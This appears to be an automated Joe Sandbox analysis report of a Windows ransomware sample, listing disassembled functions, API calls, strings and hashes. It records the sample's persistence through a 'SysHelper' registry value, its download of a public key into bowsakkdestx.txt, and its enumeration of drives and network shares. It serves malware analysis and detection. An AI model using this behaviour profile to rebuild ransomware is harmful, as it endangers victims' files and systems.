                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateDirectory__wfsopen_fgetws_memmove
                                                                                                                                                                        • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                                                                                        • API String ID: 2864494435-54166481
                                                                                                                                                                        • Opcode ID: f0b8e0fd2ac4f7ecca23973f4be2395a0830663cab163be1f7376a5d070d1046
                                                                                                                                                                        • Instruction ID: 6e8bfda4566311ad9c3c4e9222c815743aa82484fe0240dd741411c0752e853b
                                                                                                                                                                        • Opcode Fuzzy Hash: f0b8e0fd2ac4f7ecca23973f4be2395a0830663cab163be1f7376a5d070d1046
                                                                                                                                                                        • Instruction Fuzzy Hash: D1910372D5034A9BCF21DFA5CC857EEB7B4BF04304F64012AE815A7281E775AE25CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 002EC6A0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49registryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 2246 2ec6a0-2ec6ca RegOpenKeyExW 2247 2ec6cc-2ec6fb RegQueryValueExW 2246->2247 2248 2ec734-2ec739 2246->2248 2249 2ec70c-2ec72e RegSetValueExW RegCloseKey 2247->2249 2250 2ec6fd-2ec70b RegCloseKey 2247->2250 2249->2248
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,002FE6D4), ref: 002EC6C2
                                                                                                                                                                        • RegQueryValueExW.KERNEL32(00000000,SysHelper,00000000,00000004,?,?), ref: 002EC6F3
                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 002EC700
                                                                                                                                                                        • RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,00000004), ref: 002EC725
                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 002EC72E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseValue$OpenQuery
                                                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion$SysHelper
                                                                                                                                                                        • API String ID: 3962714758-1667468722
                                                                                                                                                                        • Opcode ID: 7be261611c7d912ccffd6ba265deec5eba144c63b5193395774e1483e99e582d
                                                                                                                                                                        • Instruction ID: 3b070650a1401e5de002aa689e3d119f5fb3044c2ccbe2988dbb381f59a411b7
                                                                                                                                                                        • Opcode Fuzzy Hash: 7be261611c7d912ccffd6ba265deec5eba144c63b5193395774e1483e99e582d
                                                                                                                                                                        • Instruction Fuzzy Hash: A8111B75940208FBDB11DF90DC46BEEBBBCEB04704F104195EA01B22A1D7B15A14AA50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 002FE6E8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 44stringnetworkfileCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 2251 2fe6e8-2fe6ef 2252 2fe6f0-2fe722 call 30b420 call 2ec500 2251->2252 2257 2fe72e-2fe772 InternetOpenW 2252->2257 2258 2fe724-2fe729 2252->2258 2260 2fe778-2fe77d 2257->2260 2261 2fe774-2fe776 2257->2261 2259 2fea1f-2fea40 call 303cf0 2258->2259 2268 2fea8d-2feacc lstrlenA lstrcpyA * 2 lstrlenA 2259->2268 2269 2fea42-2fea46 2259->2269 2264 2fe780-2fe789 2260->2264 2263 2fe78f-2fe7b8 call 2f5ae0 call 301c02 2261->2263 2284 2fe7be-2fe7f7 call 2f4690 call 2edd40 2263->2284 2285 2fe882-2fe8e5 call 2f5ae0 call 2f3ff0 call 2f2900 call 2f59d0 2263->2285 2264->2264 2266 2fe78b-2fe78d 2264->2266 2266->2263 2273 2feaef-2feb12 2268->2273 2274 2feace 2268->2274 2271 2fea4c-2fea61 SHGetFolderPathA 2269->2271 2272 2fee2a-2fee3a call 2f1b10 2269->2272 2271->2252 2276 2fea67-2fea88 PathAppendA DeleteFileA 2271->2276 2292 2fee4d-2fee82 call 2eef50 2272->2292 2293 2fee3c-2fee3f 2272->2293 2280 2feb18-2feb1f 2273->2280 2281 2feb14-2feb16 2273->2281 2277 2fead0-2fead8 2274->2277 2276->2252 2282 2feaeb 2277->2282 2283 2feada-2feae7 lstrlenA 2277->2283 2288 2feb22-2feb27 2280->2288 2287 2feb2b-2feb4f call 2f56d0 call 2f2900 2281->2287 2282->2273 2283->2277 2290 2feae9 2283->2290 2314 2fe86f-2fe874 2284->2314 2315 2fe7f9-2fe7fe 2284->2315 2342 2fe8e7-2fe8f0 call 302587 2285->2342 2343 2fe8f3-2fe917 lstrcpyW 2285->2343 2312 2feb53-2feb66 lstrcpyW 2287->2312 2313 2feb51 2287->2313 2288->2288 2295 2feb29 2288->2295 2290->2273 2305 2fee86-2fee8c 2292->2305 2300 2fe6e0-2fe6e6 2293->2300 2295->2287 2300->2252 2309 2fee8e-2fee90 2305->2309 2310 2fee92-2fee94 2305->2310 2318 2feea0-2feeaf call 2f3ea0 2309->2318 2320 2fee97-2fee9c 2310->2320 2321 2feb68-2feb71 call 302587 2312->2321 2322 2feb74-2febe4 lstrlenA call 300c62 call 30b420 MultiByteToWideChar lstrcpyW call 303cf0 2312->2322 2313->2312 2314->2285 2323 2fe876-2fe87f call 302587 2314->2323 2316 2fe80c-2fe827 2315->2316 2317 2fe800-2fe809 call 302587 2315->2317 2325 2fe829-2fe82d 2316->2325 2326 2fe842-2fe848 2316->2326 2317->2316 2318->2305 2344 2feeb1-2feee3 call 2eef50 2318->2344 2320->2320 2328 2fee9e 2320->2328 2321->2322 2365 2fec3d-2fec97 lstrlenW lstrlenA lstrcpyA * 2 lstrlenA 2322->2365 2366 2febe6-2febea 2322->2366 2323->2285 2334 2fe82f-2fe840 call 3005a0 2325->2334 2335 2fe84e-2fe86c 2325->2335 2326->2335 2328->2318 2334->2335 2335->2314 2342->2343 2348 2fe919-2fe920 2343->2348 2349 2fe943-2fe97a InternetOpenUrlW InternetReadFile 2343->2349 2364 2feee7-2feeed 2344->2364 2348->2349 2355 2fe922-2fe92e 2348->2355 2352 2fe9ec-2fea08 InternetCloseHandle * 2 2349->2352 2353 2fe97c-2fe994 SHGetFolderPathA 2349->2353 2360 2fea0a-2fea13 call 302587 2352->2360 2361 2fea16-2fea19 2352->2361 2353->2352 2359 2fe996-2fe9c2 PathAppendA call 3020b6 2353->2359 2362 2fe937 2355->2362 2363 2fe930-2fe935 2355->2363 2359->2352 2382 2fe9c4-2fe9e9 lstrlenA call 302b02 call 303a38 2359->2382 2360->2361 2361->2259 2369 2fe93c-2fe93d lstrcatW 2362->2369 2363->2369 2370 2feeef-2feef1 2364->2370 2371 2feef3-2feef5 2364->2371 2375 2fecbf-2fecdd 2365->2375 2376 2fec99 2365->2376 2366->2272 2373 2febf0-2fec11 SHGetFolderPathA 2366->2373 2369->2349 2378 2fef01-2fef10 call 2f3ea0 2370->2378 2372 2feef8-2feefd 2371->2372 2372->2372 2379 2feeff 2372->2379 2373->2252 2380 2fec17-2fec38 PathAppendA DeleteFileA 2373->2380 2384 2fecdf-2fece1 2375->2384 2385 2fece3-2feced 2375->2385 2383 2feca0-2feca8 2376->2383 2378->2364 2393 2fef12-2fef4c call 2f3ff0 call 2f2900 2378->2393 2379->2378 2380->2300 2382->2352 2388 2fecbb 2383->2388 2389 2fecaa-2fecb7 lstrlenA 2383->2389 2390 2fecf9-2fed1b call 2f56d0 call 2f2900 2384->2390 2391 2fecf0-2fecf5 2385->2391 2388->2375 2389->2383 2395 2fecb9 2389->2395 2405 2fed1f-2fed35 lstrcpyW 2390->2405 2406 2fed1d 2390->2406 2391->2391 2396 2fecf7 2391->2396 2410 2fef4e 2393->2410 2411 2fef50-2fef68 lstrcpyW 2393->2411 2395->2375 2396->2390 2408 2fed37-2fed40 call 302587 2405->2408 2409 2fed43-2fedab lstrlenA call 300c62 call 30b420 MultiByteToWideChar lstrcpyW lstrlenW 2405->2409 2406->2405 2408->2409 2426 2fedad-2fedb6 lstrlenW 2409->2426 2427 2fedbc-2fedc1 2409->2427 2410->2411 2414 2fef6a-2fef73 call 302587 2411->2414 2415 2fef76-2fefb3 call 2f3ff0 call 2f2900 2411->2415 2414->2415 2430 2fefb7-2fefc6 lstrcpyW 2415->2430 2431 2fefb5 2415->2431 2426->2427 2432 2fee44-2fee48 2426->2432 2428 2fedc3-2fede4 SHGetFolderPathA 2427->2428 2429 2fee10-2fee12 2427->2429 2428->2252 2433 2fedea-2fee0b PathAppendA DeleteFileA 2428->2433 2434 2fee1d-2fee1f 2429->2434 2435 2fee14-2fee1a call 300bed 2429->2435 2436 2fefc8-2fefd1 call 302587 2430->2436 2437 2fefd4-2fefe0 2430->2437 2431->2430 2438 2ff01a-2ff030 2432->2438 2433->2300 2434->2272 2440 2fee21-2fee27 call 300bed 2434->2440 2435->2434 2436->2437 2442 2fefee-2ff008 2437->2442 2443 2fefe2-2fefeb call 302587 2437->2443 2440->2272 2448 2ff00a-2ff013 call 302587 2442->2448 2449 2ff016 2442->2449 2443->2442 2448->2449 2449->2438
                                                                                                                                                                        APIs
                                                                                                                                                                        • _memset.LIBCMT ref: 002FE707
                                                                                                                                                                          • Part of subcall function 002EC500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 002EC51B
                                                                                                                                                                        • InternetOpenW.WININET ref: 002FE743
                                                                                                                                                                        • _wcsstr.LIBCMT ref: 002FE7AE
                                                                                                                                                                        • _memmove.LIBCMT ref: 002FE838
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,?), ref: 002FE90A
                                                                                                                                                                        • lstrcatW.KERNEL32(?,&first=false), ref: 002FE93D
                                                                                                                                                                        • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 002FE954
                                                                                                                                                                        • InternetReadFile.WININET(00000000,?,00000400,?), ref: 002FE96F
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 002FE98C
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 002FE9A3
                                                                                                                                                                        • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 002FE9CD
                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 002FE9F3
                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 002FE9F6
                                                                                                                                                                        • _strstr.LIBCMT ref: 002FEA36
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 002FEA59
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 002FEA74
                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 002FEA82
                                                                                                                                                                        • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 002FEA92
                                                                                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 002FEAA4
                                                                                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 002FEABA
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 002FEAC8
                                                                                                                                                                        • lstrlenA.KERNEL32(00000022), ref: 002FEAE3
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 002FEB5B
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 002FEB7C
                                                                                                                                                                        • _malloc.LIBCMT ref: 002FEB86
                                                                                                                                                                        • _memset.LIBCMT ref: 002FEB94
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 002FEBAE
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 002FEBB6
                                                                                                                                                                        • _strstr.LIBCMT ref: 002FEBDA
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 002FEC00
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 002FEC24
                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 002FEC32
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Path$Internetlstrcpylstrlen$Folder$AppendFile$CloseDeleteHandleOpen_memset_strstr$ByteCharMultiReadWide_malloc_memmove_wcsstrlstrcat
                                                                                                                                                                        • String ID: bowsakkdestx.txt${"public_key":"
                                                                                                                                                                        • API String ID: 2805819797-1771568745
                                                                                                                                                                        • Opcode ID: 21e41f05db8e6cb3235eee6b502a079510cbef7538ea061d7d7947da9d35fb83
                                                                                                                                                                        • Instruction ID: 2931cdc0a2376392801e2298e99729cf588b5d61f28e93b1d5d62f2fb735c0c8
                                                                                                                                                                        • Opcode Fuzzy Hash: 21e41f05db8e6cb3235eee6b502a079510cbef7538ea061d7d7947da9d35fb83
                                                                                                                                                                        • Instruction Fuzzy Hash: 0C019230558389AADB32DF209C05BEBBBDDAF51744F444828FA84D2182EB749218CB53
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 002F1B10 Relevance: 10.6, APIs: 7, Instructions: 50timewindowsleepCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • timeGetTime.WINMM(?,?,?,?,002FEE2F), ref: 002F1B1E
                                                                                                                                                                        • timeGetTime.WINMM(?,?,002FEE2F), ref: 002F1B29
                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002F1B4C
                                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 002F1B5C
                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002F1B6A
                                                                                                                                                                        • Sleep.KERNEL32(00000064,?,?,002FEE2F), ref: 002F1B72
                                                                                                                                                                        • timeGetTime.WINMM(?,?,002FEE2F), ref: 002F1B78
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageTimetime$Peek$DispatchSleep
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3697694649-0
                                                                                                                                                                        • Opcode ID: 88db38d945f8944db39d10810900220d6143aa6b83b544b93e03811386bb23dd
                                                                                                                                                                        • Instruction ID: ea0ec3c0ac902422435b0f553662ce8f615307e32d690a9d38bf929c0d2e4703
                                                                                                                                                                        • Opcode Fuzzy Hash: 88db38d945f8944db39d10810900220d6143aa6b83b544b93e03811386bb23dd
                                                                                                                                                                        • Instruction Fuzzy Hash: B2017136A5031DEADF20ABA59C45FEDB76CAB08B84F444065E700A71C0E665A9218BA5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 002EC500 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 002EC51B
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 002EC539
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Path$AppendFolder
                                                                                                                                                                        • String ID: bowsakkdestx.txt
                                                                                                                                                                        • API String ID: 29327785-2616962270
                                                                                                                                                                        • Opcode ID: 818451290eebd2a31c7a553de981ff096e1473dccc9fdab57da6b92eb0684e4e
                                                                                                                                                                        • Instruction ID: 4afac015674c50e77cdc25e6df58f37abd93f886abe3fa862c6e12bbd2c4eafa
                                                                                                                                                                        • Opcode Fuzzy Hash: 818451290eebd2a31c7a553de981ff096e1473dccc9fdab57da6b92eb0684e4e
                                                                                                                                                                        • Instruction Fuzzy Hash: 25112073B8132432DD3175A56C47FDB735C9F46721F8000A2FE0CDA1C2E566555541D1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 002FBA80 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 002FBAAD
                                                                                                                                                                        • ShowWindow.USER32(00000000,00000000), ref: 002FBABE
                                                                                                                                                                        • UpdateWindow.USER32(00000000), ref: 002FBAC5
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$CreateShowUpdate
                                                                                                                                                                        • String ID: LPCWSTRszTitle$LPCWSTRszWindowClass
                                                                                                                                                                        • API String ID: 2944774295-3503800400
                                                                                                                                                                        • Opcode ID: 54525baa4414e9477203d28d138aeeb9974c867fc8a69b8e2b8e22988b596f32
                                                                                                                                                                        • Instruction ID: 16325dbfc45cca84fbd70f74af6bc923c5caf8788fe6813cea0633dc4176e162
                                                                                                                                                                        • Opcode Fuzzy Hash: 54525baa4414e9477203d28d138aeeb9974c867fc8a69b8e2b8e22988b596f32
                                                                                                                                                                        • Instruction Fuzzy Hash: D6E04F3569173077E6735B15BC0BFA62518E702F10F304119FB007A2D0C7E969418A8C
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 002F0BD0 Relevance: 7.7, APIs: 5, Instructions: 234sharememoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • WNetOpenEnumW.MPR(00000002,00000000,00000000,00000000,?), ref: 002F0C12
                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00004000), ref: 002F0C39
                                                                                                                                                                        • _memset.LIBCMT ref: 002F0C4C
                                                                                                                                                                        • WNetEnumResourceW.MPR(?,?,00000000,?), ref: 002F0C63
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Enum$AllocGlobalOpenResource_memset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 364255426-0
                                                                                                                                                                        • Opcode ID: f7f94d2a94bb05695464b8ddf387bce8605754f60790bb84027145789b11714d
                                                                                                                                                                        • Instruction ID: 8978fbcf79a7cf6c483929e30fbe80389b191a7ebb30968fe43e5a7e57f18fd2
                                                                                                                                                                        • Opcode Fuzzy Hash: f7f94d2a94bb05695464b8ddf387bce8605754f60790bb84027145789b11714d
                                                                                                                                                                        • Instruction Fuzzy Hash: F091BF756283458FD728CF68C891B7BF7E1FF88744F14892DE68A87282D770A910CB52
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 002F0A50 Relevance: 7.6, APIs: 5, Instructions: 104COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetLogicalDrives.KERNEL32 ref: 002F0A75
                                                                                                                                                                        • SetErrorMode.KERNEL32(00000001,003E0234,00000002), ref: 002F0AE2
                                                                                                                                                                        • PathFileExistsA.SHLWAPI(?), ref: 002F0AF9
                                                                                                                                                                        • SetErrorMode.KERNEL32(00000000), ref: 002F0B02
                                                                                                                                                                        • GetDriveTypeA.KERNEL32(?), ref: 002F0B1B
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
